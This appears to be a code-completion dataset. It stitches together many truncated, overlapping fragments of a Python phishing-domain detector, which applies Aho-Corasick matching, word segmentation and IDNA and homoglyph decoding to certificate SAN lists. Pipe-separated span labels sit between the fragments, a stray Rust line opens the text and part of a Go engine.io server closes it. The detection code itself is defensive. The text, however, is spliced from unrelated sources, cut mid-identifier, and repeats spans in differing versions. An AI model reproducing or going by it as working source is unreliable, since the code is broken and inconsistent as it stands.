/// assert_eq!(client.ctx(), Ctx:: | o_threads( | identifier_name |
common_domain_analyser.py | domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# Remove some FP-prone parts
domain = re.sub(AhoCorasickDomainMatching.IGNORED_PARTS, '', domain)
# Similar to all domains in the list, the TLD will be stripped off
ext = tldextract.extract(domain)
# The match will be a tuple in the following format: (5, (0, 'google'))
matches = [m[1][1] for m in self.automaton.iter('.'.join(ext[:2]))
if len(m[1][1]) >= AhoCorasickDomainMatching.MIN_MATCHING_LENGTH]
if matches:
matches.sort(key=len)
match = matches[-1]
# We only keep the longest match of the first matching domain
# for now
results[domain] = [self.domains[match]] if match in self.domains else match
break
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
class WordSegmentation(Analyser):
'''
Perform word segmentation of all the SAN domains as an attempt to make sense
of their names. For example, both arch.mappleonline.com and apple-verifyupdate.serveftp.com
domains have 'apple' inside but only the second one is an actual Apple phishing
page. Intuitively, a good word segmentation algorithm will return:
- arch + mapple + online + com
- apple + verify + update + serve + ftp + com
Thus, it's much easier to spot the second phishing domain.
Implementation-wise, there are several existing packages around to do this, for
example:
- https://github.com/grantjenks/python-wordsegment
- https://github.com/keredson/wordninja
Let's see what they can do, take it away!
'''
# Some common stop words that are in the list of most popular domains
STOPWORDS = {
'app': 1,
'inc': 1,
'box': 1,
'health': 1,
'home': 1,
'space': 1,
'cars': 1,
'nature': 1,
}
def __init__(self):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
def run(self, record):
'''
Apply word segmentation to all the SAN domain names. Let's see if it makes
any sense.
'''
if 'analysers' not in record:
record['analysers'] = []
results = {}
# Check the domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# The TLD will be stripped off because it does not contribute anything here
ext = tldextract.extract(domain)
words = []
# We choose to segment the TLD here as well, for example, .co.uk
# will become ['co', 'uk']. Let's see if this works out.
for part in ext[:]:
for token in part.split('.'):
segmented = [w for w in wordsegment.segment(token) if w not in WordSegmentation.STOPWORDS]
if segmented:
words.extend(segmented)
elif token:
# For some IDNA domain like xn--wgbfq3d.xn--ngbc5azd, the segmentation
# won't work and an empty array is returned. So we choose to just keep
# the original token
words.append(token)
results[domain] = words
if results:
|
return record
class DomainMatchingOption(Enum):
'''
Control how strict we want to do our matching.
'''
# For example applefake.it will match with apple.com because ['apple'] is
# a subset of ['apple', 'fake']
SUBSET_MATCH = 0
# Similar, but uses substring containment ('in') instead of issubset so that the order is preserved
ORDER_MATCH = 1
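# --- Illustrative sketch (editor's addition, not part of the original pipeline) ---
# A minimal, self-contained illustration of the difference between the two options
# above. The token lists are made up for illustration; with SUBSET_MATCH the
# legitimate tokens only have to appear somewhere among the candidate's tokens,
# while ORDER_MATCH mirrors the substring check used in DomainMatching._match
# below and also requires them to appear as a contiguous, ordered run.
def _example_domain_matching_options():
    legit = ['apple', 'com']
    phish = ['apple', 'fake', 'com']
    subset_hit = set(legit).issubset(set(phish))                  # True
    order_hit = '.{}'.format('.'.join(legit)) in '.'.join(phish)  # False: tokens not adjacent
    return subset_hit, order_hit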
class DomainMatching(Analyser):
'''
This is the first example of the new group of meta analysers which are used
to combine the result of other analysers.
'''
def __init__(self, include_tld=True, option=DomainMatchingOption.ORDER_MATCH):
'''
Load the wordsegment package and store the matching options for later use.
'''
wordsegment.load()
# Save the matching option here so we can refer to it later
self.include_tld = include_tld
self.option = {
DomainMatchingOption.SUBSET_MATCH: set,
DomainMatchingOption.ORDER_MATCH: list,
}[option]
def run(self, record):
'''
Note that a meta-analyser will need to run after other analysers have
finished so that their outputs are available.
'''
if 'analysers' not in record:
return record
analysers = {
AhoCorasickDomainMatching.__name__: {},
WordSegmentation.__name__: {},
BulkDomainMarker.__name__: {},
}
for analyser in record['analysers']:
name = analyser['analyser']
if name not in analysers:
continue
if name == BulkDomainMarker.__name__ and analyser['output']:
# Skip bulk record and deal with it later, with such large
# number of SAN names, it's bound to be a match
continue
analysers[name] = analyser['output']
# Check that all outputs are there before continuing
if not analysers[AhoCorasickDomainMatching.__name__] or not analysers[WordSegmentation.__name__]:
return record
results = self._match(analysers[AhoCorasickDomainMatching.__name__],
analysers[WordSegmentation.__name__])
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
def _match(self, ahocorasick_output, segmentation_output):
'''
Used internally by the run function to combine the AhoCorasick and WordSegmentation
results.
'''
results = {}
# Check all the matching domains reported by AhoCorasick analyser
for match, domains in ahocorasick_output.items():
# The result of the AhoCorasick matcher is a list of matching domains, for example,
#
# {
# 'analyser': 'AhoCorasickDomainMatching',
# 'output': {
# 'login-appleid.apple.com.managesuppport.co': ['apple.com', 'support.com'],
# },
# },
#
if match not in segmentation_output:
continue
phish = self.option(segmentation_output[match])
match_ext = tldextract.extract(match)
for domain in domains:
ext = tldextract.extract(domain)
# This record is from a legitimate source, for example, agrosupport.zendesk.com
# will match with zendesk.com. In our case, we don't really care about this so
# it will be ignored and not reported as a match.
if ext[1:] == match_ext[1:]:
continue
tmp = []
# Intuitively, it will be more accurate if we choose to include the TLD here.
# For example, if both 'apple' and 'com' appear in the matching domain, it's
# very likely that some phishing is going on here. On the other hand,
# if only 'apple' occurs, we are not so sure and it's better left for more
# advanced analysers to have their say on that
for part in ext[:] if self.include_tld else ext[:2]:
for token in part.split('.'):
tmp.extend(wordsegment.segment(token))
legit = self.option(tmp)
if (isinstance(phish, set) and legit.issubset(phish)) or \
(isinstance(phish, list) and '.{}'.format('.'.join(legit)) in '.'.join(phish)):
# Found a possible phishing domain
if match not in results:
results[match] = []
results[match].append(domain)
return results
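# --- Illustrative sketch (editor's addition, not part of the original pipeline) ---
# A hypothetical example of how the two analyser outputs are combined. The domain
# and the pre-segmented token list are made up, but they follow the shapes produced
# by AhoCorasickDomainMatching and WordSegmentation above; the private _match helper
# is called directly purely for illustration.
def _example_domain_matching():
    matcher = DomainMatching(include_tld=True, option=DomainMatchingOption.ORDER_MATCH)
    ahocorasick_output = {
        'login-appleid.apple.com.managesuppport.co': ['apple.com'],
    }
    segmentation_output = {
        'login-appleid.apple.com.managesuppport.co':
            ['login', 'apple', 'id', 'apple', 'com', 'manage', 'suppport', 'co'],
    }
    # The legitimate tokens ['apple', 'com'] appear as the contiguous run '.apple.com'
    # in the joined candidate tokens, so the domain should be reported, roughly as:
    # {'login-appleid.apple.com.managesuppport.co': ['apple.com']}
    return matcher._match(ahocorasick_output, segmentation_output)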
class BulkDomainMarker(Analyser):
'''
Mark the record that has tons of SAN domains in it. Most of the time, they are
completely unrelated domains and probably the result of some bulk registration
process. Benign or not, they are still suspicious and probably spam. We can also
verify the similarity among these domains. A lower similarity score means these
domains are totally unrelated.
'''
def __init__(self, threshold=BULK_DOMAIN_THRESHOLD):
'''
Set the threshold to mark the record as a bulk record.
'''
self.threshold = threshold
def run(self, record):
'''
See if the record is a bulk record. We will just use the threshold as
the indicator for now. So if a record has more SAN names than the
threshold, it is a bulk record.
'''
if 'analys | record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
}) | conditional_block |
common_domain_analyser.py | name == BulkDomainMarker.__name__ and analyser['output']:
# Skip bulk record and deal with it later, with such large
# number of SAN names, it's bound to be a match
continue
analysers[name] = analyser['output']
# Check that all outputs are there before continuing
if not analysers[AhoCorasickDomainMatching.__name__] or not analysers[WordSegmentation.__name__]:
return record
results = self._match(analysers[AhoCorasickDomainMatching.__name__],
analysers[WordSegmentation.__name__])
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
def _match(self, ahocorasick_output, segmentation_output):
'''
Used internally by the run function to combine the AhoCorasick and WordSegmentation
results.
'''
results = {}
# Check all the matching domains reported by AhoCorasick analyser
for match, domains in ahocorasick_output.items():
# The result of the AhoCorasick matcher is a list of matching domains, for example,
#
# {
# 'analyser': 'AhoCorasickDomainMatching',
# 'output': {
# 'login-appleid.apple.com.managesuppport.co': ['apple.com', 'support.com'],
# },
# },
#
if match not in segmentation_output:
continue
phish = self.option(segmentation_output[match])
match_ext = tldextract.extract(match)
for domain in domains:
ext = tldextract.extract(domain)
# This record is from a legitimate source, for example, agrosupport.zendesk.com
# will match with zendesk.com. In our case, we don't really care about this so
# it will be ignored and not reported as a match.
if ext[1:] == match_ext[1:]:
continue
tmp = []
# Intuitively, it will be more accurate if we choose to include the TLD here.
# For example, if both 'apple' and 'com' appear in the matching domain, it's
# very likely that some phishing is going on here. On the other hand,
# if only 'apple' occurs, we are not so sure and it's better left for more
# advanced analysers to have their say on that
for part in ext[:] if self.include_tld else ext[:2]:
for token in part.split('.'):
tmp.extend(wordsegment.segment(token))
legit = self.option(tmp)
if (isinstance(phish, set) and legit.issubset(phish)) or \
(isinstance(phish, list) and '.{}'.format('.'.join(legit)) in '.'.join(phish)):
# Found a possible phishing domain
if match not in results:
results[match] = []
results[match].append(domain)
return results
class BulkDomainMarker(Analyser):
'''
Mark the record that has tons of SAN domains in it. Most of the time, they are
completely unrelated domains and probably the result of some bulk registration
process. Benign or not, they are still suspicious and probably spam. We can also
verify the similarity among these domains. A lower similarity score means these
domains are totally unrelated.
'''
def __init__(self, threshold=BULK_DOMAIN_THRESHOLD):
'''
Set the threshold to mark the record as a bulk record.
'''
self.threshold = threshold
def run(self, record):
'''
See if the record is a bulk record. We will just use the threshold as
the indicator for now. So if a record has more SAN names than the
threshold, it is a bulk record.
'''
if 'analysers' not in record:
record['analysers'] = []
is_bulked = len(record['all_domains']) >= self.threshold
record['analysers'].append({
'analyser': type(self).__name__,
'output': is_bulked,
})
return record
class IDNADecoder(Analyser):
'''
Decode all domains in IDNA format.
'''
def run(self, record):
'''
Check if a domain in the list is in IDNA format and convert it back to
Unicode.
'''
decoded = []
for domain in record['all_domains']:
wildcard = False
try:
if re.match(r'^\*\.', domain):
wildcard = True
# Remove the wildcard because it interferes with the IDNA module
# and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
domain = idna.decode(domain)
except idna.core.InvalidCodepoint:
# Fail to decode the domain, just keep it as it is for now
pass
except UnicodeError:
pass
finally:
if wildcard:
domain = '*.{}'.format(domain)
decoded.append(domain)
record['all_domains'] = decoded
return record
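# --- Illustrative sketch (editor's addition, not part of the original pipeline) ---
# A small, hypothetical usage of IDNADecoder on the record shape used throughout
# this module ({'all_domains': [...]}). The punycode sample is the standard
# 'bücher' example; the exact output depends on the idna package.
def _example_idna_decoding():
    analyser = IDNADecoder()
    record = {'all_domains': ['*.xn--bcher-kva.ch', 'example.com']}
    decoded = analyser.run(record)['all_domains']
    # Expected (approximately): ['*.bücher.ch', 'example.com']
    return decoded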
class HomoglyphsDecoder(Analyser):
'''
Smartly convert domains whose names include some suspicious homoglyphs to
ASCII. This will probably need to be done right after IDNA conversion and
before other analysers so that they can benefit from it.
'''
def __init__(self, greedy=False):
'''
We rely on the confusable-homoglyphs at https://github.com/vhf/confusable_homoglyphs
to do its magic.
If the greedy flag is set, all alternative domains will be returned. Otherwise, only
the first one will be available.
'''
self.greedy = greedy
def run(self, record):
'''
Using the confusable-homoglyphs package, we are going to generate all alternative ASCII
names of a domain. It's a bit of a brute force though.
'''
decoded = []
# For our specific case, we will only care about latin characters
lower_s = range(ord('a'), ord('z') + 1)
upper_s = range(ord('A'), ord('Z') + 1)
for domain in record['all_domains']:
wildcard = False
if re.match(r'^\*\.', domain):
wildcard = True
# Remove wildcard to simplify the domain name a bit and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
# is_confusable() returns False, not [], when nothing is confusable, so guard the iteration
hg_map = {hg['character']: hg for hg in (confusables.is_confusable(domain, greedy=True) or [])}
decoded_domain_c = []
for domain_c in domain:
# Confusable homoglyphs could not find any homoglyphs for this character
# so we decide to keep the original character as it is
if domain_c not in hg_map:
decoded_domain_c.append([domain_c])
continue
found = []
hglyph = hg_map[domain_c]
if hglyph['alias'] == 'LATIN':
# The character is latin, we don't need to do anything here
found.append(hglyph['character'])
for alt in hglyph['homoglyphs']:
is_latin = True
# We need to check the length of the homoglyph here because the
# confusable_homoglyphs library nicely returns multi-character
# matches as well, for example, 'rn' has an alternative of 'm'
for alt_c in alt['c']:
if ord(alt_c) not in lower_s and ord(alt_c) not in upper_s:
is_latin = False
break
if is_latin:
found.append(alt['c'].lower())
# If nothing is found, we keep the original character
if not found:
found.append(hglyph['character'])
decoded_domain_c.append(found)
for alt in self._generate_alternatives(decoded_domain_c):
if wildcard:
alt = '*.{}'.format(alt)
decoded.append(alt)
if not self.greedy:
break
record['all_domains'] = decoded
return record
def _generate_alternatives(self, alt_characters, index=0, current=''):
'''
Generate all alternative ASCII names of a domain using the list of all
alternative characters.
'''
if index == len(alt_characters):
yield current
else:
for alt_c in alt_characters[index]:
yield from self._generate_alternatives(alt_characters,
index + 1,
current + alt_c)
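# --- Illustrative sketch (editor's addition, not part of the original pipeline) ---
# A hypothetical run of HomoglyphsDecoder over a domain whose first character is
# the Cyrillic 'а' (U+0430) rather than the Latin 'a'. With greedy=True every
# Latin-only alternative is generated; the exact list and its order depend on the
# confusable_homoglyphs data, but 'apple.com' should be among the alternatives.
def _example_homoglyphs_decoding():
    analyser = HomoglyphsDecoder(greedy=True)
    record = {'all_domains': ['\u0430pple.com']}  # 'аpple.com' with a Cyrillic 'а'
    return analyser.run(record)['all_domains']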
class FeaturesGenerator(Analyser):
| '''
Generate features to detect outliers in the stream. In our case, the outliers are
the 'suspicious' phishing domains.
'''
NOSTRIL_LENGTH_LIMIT = 6
# pylint: disable=invalid-name
def run(self, record):
'''
The list of features will be:
- The number of domain parts, for example, www.google.com is 3.
- The overall length in characters.
- The length of the longest domain part.
- The length of the TLD, e.g. .online or .download is longer than .com.
- The randomness level of the domain.
'''
if 'analysers' not in record:
record['analysers'] = []
x_samples = [] | identifier_body |
|
common_domain_analyser.py | domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# Remove some FP-prone parts
domain = re.sub(AhoCorasickDomainMatching.IGNORED_PARTS, '', domain)
# Similar to all domains in the list, the TLD will be stripped off
ext = tldextract.extract(domain)
# The match will be a tuple in the following format: (5, (0, 'google'))
matches = [m[1][1] for m in self.automaton.iter('.'.join(ext[:2]))
if len(m[1][1]) >= AhoCorasickDomainMatching.MIN_MATCHING_LENGTH]
if matches:
matches.sort(key=len)
match = matches[-1]
# We only keep the longest match of the first matching domain
# for now
results[domain] = [self.domains[match]] if match in self.domains else match
break
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
class WordSegmentation(Analyser):
'''
Perform word segmentation of all the SAN domains as an attempt to make sense
of their names. For example, both arch.mappleonline.com and apple-verifyupdate.serveftp.com
domains have 'apple' inside but only the second one is an actual Apple phishing
page. Intuitively, a good word segmentation algorithm will return:
- arch + mapple + online + com
- apple + verify + update + serve + ftp + com
Thus, it's much easier to spot the second phishing domain.
Implementation-wise, there are several existing packages around to do this, for
example:
- https://github.com/grantjenks/python-wordsegment
- https://github.com/keredson/wordninja
Let's see what they can do, take it away!
'''
# Some common stop words that are in the list of most popular domains
STOPWORDS = {
'app': 1,
'inc': 1,
'box': 1,
'health': 1,
'home': 1,
'space': 1,
'cars': 1,
'nature': 1,
}
def __init__(self):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
def run(self, record):
'''
Apply word segmentation to all the SAN domain names. Let's see if it makes
any sense.
'''
if 'analysers' not in record:
record['analysers'] = []
results = {}
# Check the domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# The TLD will be stripped off because it does not contribute anything here
ext = tldextract.extract(domain)
words = []
# We choose to segment the TLD here as well, for example, .co.uk
# will become ['co', 'uk']. Let's see if this works out.
for part in ext[:]:
for token in part.split('.'):
segmented = [w for w in wordsegment.segment(token) if w not in WordSegmentation.STOPWORDS]
if segmented:
words.extend(segmented)
elif token:
# For some IDNA domain like xn--wgbfq3d.xn--ngbc5azd, the segmentation
# won't work and an empty array is returned. So we choose to just keep
# the original token
words.append(token)
results[domain] = words
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
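# --- Illustrative sketch (editor's addition, not part of the original pipeline) ---
# A minimal, hypothetical usage of WordSegmentation on the record shape used by
# these analysers. The exact split depends on the public-suffix list used by
# tldextract and on the wordsegment corpus, so the tokens below are indicative
# only; the point is that the phishing name decomposes into recognisable words.
def _example_word_segmentation():
    analyser = WordSegmentation()
    record = {'all_domains': ['apple-verifyupdate.serveftp.com']}
    output = analyser.run(record)['analysers'][-1]['output']
    # Roughly: {'apple-verifyupdate.serveftp.com':
    #           ['apple', 'verify', 'update', 'serve', 'ftp', 'com']}
    return output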
class | (Enum):
'''
Control how strict we want to do our matching.
'''
# For example applefake.it will match with apple.com because ['apple'] is
# a subset of ['apple', 'fake']
SUBSET_MATCH = 0
# Similar, but uses substring containment ('in') instead of issubset so that the order is preserved
ORDER_MATCH = 1
class DomainMatching(Analyser):
'''
This is the first example of the new group of meta analysers which are used
to combine the result of other analysers.
'''
def __init__(self, include_tld=True, option=DomainMatchingOption.ORDER_MATCH):
'''
Load the wordsegment package and store the matching options for later use.
'''
wordsegment.load()
# Save the matching option here so we can refer to it later
self.include_tld = include_tld
self.option = {
DomainMatchingOption.SUBSET_MATCH: set,
DomainMatchingOption.ORDER_MATCH: list,
}[option]
def run(self, record):
'''
Note that a meta-analyser will need to run after other analysers have
finished so that their outputs are available.
'''
if 'analysers' not in record:
return record
analysers = {
AhoCorasickDomainMatching.__name__: {},
WordSegmentation.__name__: {},
BulkDomainMarker.__name__: {},
}
for analyser in record['analysers']:
name = analyser['analyser']
if name not in analysers:
continue
if name == BulkDomainMarker.__name__ and analyser['output']:
# Skip bulk record and deal with it later, with such large
# number of SAN names, it's bound to be a match
continue
analysers[name] = analyser['output']
# Check that all outputs are there before continuing
if not analysers[AhoCorasickDomainMatching.__name__] or not analysers[WordSegmentation.__name__]:
return record
results = self._match(analysers[AhoCorasickDomainMatching.__name__],
analysers[WordSegmentation.__name__])
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
def _match(self, ahocorasick_output, segmentation_output):
'''
Used internally by the run function to combine the AhoCorasick and WordSegmentation
results.
'''
results = {}
# Check all the matching domains reported by AhoCorasick analyser
for match, domains in ahocorasick_output.items():
# The result of the AhoCorasick matcher is a list of matching domains, for example,
#
# {
# 'analyser': 'AhoCorasickDomainMatching',
# 'output': {
# 'login-appleid.apple.com.managesuppport.co': ['apple.com', 'support.com'],
# },
# },
#
if match not in segmentation_output:
continue
phish = self.option(segmentation_output[match])
match_ext = tldextract.extract(match)
for domain in domains:
ext = tldextract.extract(domain)
# This record is from a legitimate source, for example, agrosupport.zendesk.com
# will match with zendesk.com. In our case, we don't really care about this so
# it will be ignored and not reported as a match.
if ext[1:] == match_ext[1:]:
continue
tmp = []
# Intuitively, it will be more accurate if we choose to include the TLD here.
# For example, if both 'apple' and 'com' appear in the matching domain, it's
# very likely that some phishing is going on here. On the other hand,
# if only 'apple' occurs, we are not so sure and it's better left for more
# advanced analysers to have their say on that
for part in ext[:] if self.include_tld else ext[:2]:
for token in part.split('.'):
tmp.extend(wordsegment.segment(token))
legit = self.option(tmp)
if (isinstance(phish, set) and legit.issubset(phish)) or \
(isinstance(phish, list) and '.{}'.format('.'.join(legit)) in '.'.join(phish)):
# Found a possible phishing domain
if match not in results:
results[match] = []
results[match].append(domain)
return results
class BulkDomainMarker(Analyser):
'''
Mark the record that has tons of SAN domains in it. Most of the time, they are
completely unrelated domains and probably the result of some bulk registration
process. Benign or not, they are still suspicious and probably spam. We can also
verify the similarity among these domains. A lower similarity score means these
domains are totally unrelated.
'''
def __init__(self, threshold=BULK_DOMAIN_THRESHOLD):
'''
Set the threshold to mark the record as a bulk record.
'''
self.threshold = threshold
def run(self, record):
'''
See if the record is a bulk record. We will just use the threshold as
the indicator for now. So if a record has more SAN names than the
threshold, it is a bulk record.
'''
if 'analys | DomainMatchingOption | identifier_name |
common_domain_analyser.py | ers.
'''
def __init__(self, include_tld=True, option=DomainMatchingOption.ORDER_MATCH):
'''
Load the wordsegment package and store the matching options for later use.
'''
wordsegment.load()
# Save the matching option here so we can refer to it later
self.include_tld = include_tld
self.option = {
DomainMatchingOption.SUBSET_MATCH: set,
DomainMatchingOption.ORDER_MATCH: list,
}[option]
def run(self, record):
'''
Note that a meta-analyser will need to run after other analysers have
finished so that their outputs are available.
'''
if 'analysers' not in record:
return record
analysers = {
AhoCorasickDomainMatching.__name__: {},
WordSegmentation.__name__: {},
BulkDomainMarker.__name__: {},
}
for analyser in record['analysers']:
name = analyser['analyser']
if name not in analysers:
continue
if name == BulkDomainMarker.__name__ and analyser['output']:
# Skip bulk record and deal with it later, with such large
# number of SAN names, it's bound to be a match
continue
analysers[name] = analyser['output']
# Check that all outputs are there before continuing
if not analysers[AhoCorasickDomainMatching.__name__] or not analysers[WordSegmentation.__name__]:
return record
results = self._match(analysers[AhoCorasickDomainMatching.__name__],
analysers[WordSegmentation.__name__])
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
def _match(self, ahocorasick_output, segmentation_output):
'''
Used internally by the run function to combine the AhoCorasick and WordSegmentation
results.
'''
results = {}
# Check all the matching domains reported by AhoCorasick analyser
for match, domains in ahocorasick_output.items():
# The result of the AhoCorasick matcher is a list of matching domains, for example,
#
# {
# 'analyser': 'AhoCorasickDomainMatching',
# 'output': {
# 'login-appleid.apple.com.managesuppport.co': ['apple.com', 'support.com'],
# },
# },
#
if match not in segmentation_output:
continue
phish = self.option(segmentation_output[match])
match_ext = tldextract.extract(match)
for domain in domains:
ext = tldextract.extract(domain)
# This record is from a legitimate source, for example, agrosupport.zendesk.com
# will match with zendesk.com. In our case, we don't really care about this so
# it will be ignored and not reported as a match.
if ext[1:] == match_ext[1:]:
continue
tmp = []
# Intuitively, it will be more accurate if we choose to include the TLD here.
# For example, if both 'apple' and 'com' appear in the matching domain, it's
# very likely that some phishing is going on here. On the other hand,
# if only 'apple' occurs, we are not so sure and it's better left for more
# advanced analysers to have their say on that
for part in ext[:] if self.include_tld else ext[:2]:
for token in part.split('.'):
tmp.extend(wordsegment.segment(token))
legit = self.option(tmp)
if (isinstance(phish, set) and legit.issubset(phish)) or \
(isinstance(phish, list) and '.{}'.format('.'.join(legit)) in '.'.join(phish)):
# Found a possible phishing domain
if match not in results:
results[match] = []
results[match].append(domain)
return results
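# Illustrative sketch (hypothetical values, not taken from a real record): the
# set/list type chosen in __init__ controls how the segmented tokens are
# compared above. SUBSET_MATCH ignores order, ORDER_MATCH requires the legit
# tokens to appear as a contiguous, ordered run:
#
#   phish = {'login', 'appleid', 'apple', 'com', 'managesuppport', 'co'}
#   legit = {'apple', 'com'}
#   legit.issubset(phish)                              # True -> flagged (subset match)
#
#   phish = ['login', 'appleid', 'apple', 'com', 'managesuppport', 'co']
#   legit = ['apple', 'com']
#   '.{}'.format('.'.join(legit)) in '.'.join(phish)   # True -> flagged (order match)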
class BulkDomainMarker(Analyser):
'''
Mark the record that has tons of SAN domains in it. Most of the time, they are
completely unrelated domains and probably the result of some bulk registration
process. Benign or not, they are still suspicious and probably spam. We can also
verify the similarity among these domains. A lower similarity score means these
domains are totally unrelated.
'''
def __init__(self, threshold=BULK_DOMAIN_THRESHOLD):
'''
Set the threshold to mark the record as a bulk record.
'''
self.threshold = threshold
def run(self, record):
'''
See if the record is a bulk record. We will just use the threshold as
the indicator for now. So if a record has more SAN names than the
threshold, it is a bulk record.
'''
if 'analysers' not in record:
record['analysers'] = []
is_bulked = len(record['all_domains']) >= self.threshold
record['analysers'].append({
'analyser': type(self).__name__,
'output': is_bulked,
})
return record
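# Illustrative sketch (hypothetical threshold and domains):
#
#   marker = BulkDomainMarker(threshold=3)
#   marker.run({'all_domains': ['a.com', 'b.com', 'c.com']})
#   # appends {'analyser': 'BulkDomainMarker', 'output': True} since 3 >= 3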
class IDNADecoder(Analyser):
'''
Decode all domains in IDNA format.
'''
def run(self, record):
'''
Check if a domain in the list is in IDNA format and convert it back to
Unicode.
'''
decoded = []
for domain in record['all_domains']:
wildcard = False
try:
if re.match(r'^\*\.', domain):
wildcard = True
# Remove the wildcard because it interferes with the IDNA module
# and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
domain = idna.decode(domain)
except idna.core.InvalidCodepoint:
# Fail to decode the domain, just keep it as it is for now
pass
except UnicodeError:
pass
finally:
if wildcard:
domain = '*.{}'.format(domain)
decoded.append(domain)
record['all_domains'] = decoded
return record
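# Illustrative sketch (assuming the idna package): a punycode (ACE) label is
# converted back to Unicode, with any leading wildcard stripped first and
# re-attached afterwards, e.g. the commonly cited homograph example
#
#   idna.decode('xn--pple-43d.com')   # -> 'аpple.com' (Cyrillic 'а', U+0430)
#   '*.xn--pple-43d.com'              # -> '*.аpple.com' after re-adding '*.'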
class HomoglyphsDecoder(Analyser):
'''
Smartly convert domains whose names include some suspicious homoglyphs to
ASCII. This will probably need to be done right after IDNA conversion and
before other analysers so that they can benefit from it.
'''
def __init__(self, greedy=False):
'''
We rely on the confusable-homoglyphs at https://github.com/vhf/confusable_homoglyphs
to do its magic.
If the greedy flag is set, all alternative domains will be returned. Otherwise, only
the first one will be available.
'''
self.greedy = greedy
def run(self, record):
'''
Using confusable-homoglyphs, we are going to generate all alternative ASCII
names of a domain. It's a bit of a brute force though.
'''
decoded = []
# For our specific case, we will only care about Latin characters
lower_s = range(ord('a'), ord('z') + 1)
upper_s = range(ord('A'), ord('Z') + 1)
for domain in record['all_domains']:
wildcard = False
if re.match(r'^\*\.', domain):
wildcard = True
# Remove wildcard to simplify the domain name a bit and we'll put it back later
domain = re.sub(r'^\*\.', '', domain)
hg_map = {hg['character']: hg for hg in confusables.is_confusable(domain, greedy=True)}
decoded_domain_c = []
for domain_c in domain:
# Confusable homoglyphs could not find any homoglyphs for this character
# so we decide to keep the original character as it is
if domain_c not in hg_map:
decoded_domain_c.append([domain_c])
continue
found = []
hglyph = hg_map[domain_c]
if hglyph['alias'] == 'LATIN':
# The character is Latin, so we don't need to do anything here
found.append(hglyph['character'])
for alt in hglyph['homoglyphs']:
is_latin = True
# We need to check the length of the homoglyph here because the
# confusable_homoglyphs library nicely returns multi-character
# matches as well, for example, 'rn' has an alternative of 'm'
for alt_c in alt['c']:
if ord(alt_c) not in lower_s and ord(alt_c) not in upper_s:
is_latin = False
break
if is_latin:
found.append(alt['c'].lower())
# If nothing is found, we keep the original character
if not found:
found.append(hglyph['character'])
decoded_domain_c.append(found)
for alt in self._generate_alternatives(decoded_domain_c):
if wildcard:
alt = '*.{}'.format(alt)
decoded.append(alt)
if not self.greedy:
break
record['all_domains'] = decoded
return record
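# Illustrative sketch (hypothetical; the actual helper defined next may be
# implemented differently, e.g. recursively): the per-character alternative
# lists collected above could be expanded into candidate names with itertools:
#
#   import itertools
#   for combo in itertools.product(*decoded_domain_c):
#       candidate = ''.join(combo)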
| def _generate_alternatives(self, alt_characters, index=0, current=''):
'''
Generate all alternative ASCII names of a domain using the list of all
alternative characters.
''' | random_line_split |
|
server.go | ReapTimeout = 5 * time.Second
)
var errorMessage = map[int]string{
errorTransportUnknown: "Transport unknown",
errorUnknownSID: "Session ID unknown",
errorBadHandshakeMethod: "Bad handshake method",
errorBadRequest: "Bad request",
}
var (
validTransports = map[string]bool{
transportWebSocket: true,
transportPolling: true,
}
validUpgrades = map[string]bool{
transportWebSocket: true,
}
)
// getValidUpgrades returns a slice containing the valid protocols
// that a connection can upgrade to.
func getValidUpgrades() []string {
upgrades := make([]string, len(validUpgrades))
i := 0
for u := range validUpgrades {
upgrades[i] = u
i++
}
return upgrades
}
// A Handler is called by the server when a connection is
// opened successfully.
type Handler func(*Conn)
type server struct {
// Handler handles an FTC connection.
Handler
basePath string
cookieName string
clients *clientSet // The set of connections (some may be closed).
wsServer *websocket.Server // The underlying WebSocket server.
}
// The defaults for options passed to the server.
const (
defaultBasePath = "/engine.io/"
defaultCookieName = "io"
)
// Options are the parameters passed to the server.
type Options struct {
// BasePath is the base URL path that the server handles requests for.
BasePath string
// CookieName is the name of the cookie set upon successful handshake.
CookieName string
}
// NewServer allocates and returns a new server with the given
// options and handler. If nil options are passed, the defaults
// specified in the constants above are used instead.
func NewServer(o *Options, h Handler) *server {
opts := Options{}
if o != nil {
opts = *o
}
if len(opts.BasePath) == 0 {
opts.BasePath = defaultBasePath
}
if len(opts.CookieName) == 0 {
opts.CookieName = defaultCookieName
}
s := &server{
Handler: h,
basePath: opts.BasePath,
cookieName: opts.CookieName,
clients: &clientSet{clients: map[string]*conn{}},
}
go s.startReaper()
s.wsServer = &websocket.Server{Handler: s.wsHandler}
return s
}
// startReaper continuously removes closed connections from the
// client set via the reap function.
func (s *server) startReaper() {
for {
if s.clients == nil {
glog.Fatal("server cannot have a nil client set")
}
s.clients.reap()
numClients.Set(int64(s.clients.len()))
time.Sleep(clientReapTimeout)
}
}
// handlePacket takes the given packet and writes the appropriate
// response to the given connection.
func (s *server) handlePacket(p packet, c *conn) error {
glog.Infof("handling packet type: %c, data: %s, upgraded: %t", p.typ, p.data, c.upgraded())
var encode func(packet) error
if c.upgraded() {
encode = newPacketEncoder(c).encode
} else {
encode = func(pkt packet) error {
return newPayloadEncoder(c).encode([]packet{pkt})
}
}
switch p.typ {
case packetTypePing:
return encode(packet{typ: packetTypePong, data: p.data})
case packetTypeMessage:
if c.pubConn != nil {
c.pubConn.onMessage(p.data)
}
case packetTypeClose:
c.Close()
}
return nil
}
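// Illustrative sketch (hypothetical call): a ping is echoed back as a pong
// carrying the same data; it is wrapped in a payload while the conn is still
// polling and written as a bare packet once the conn has been upgraded:
//
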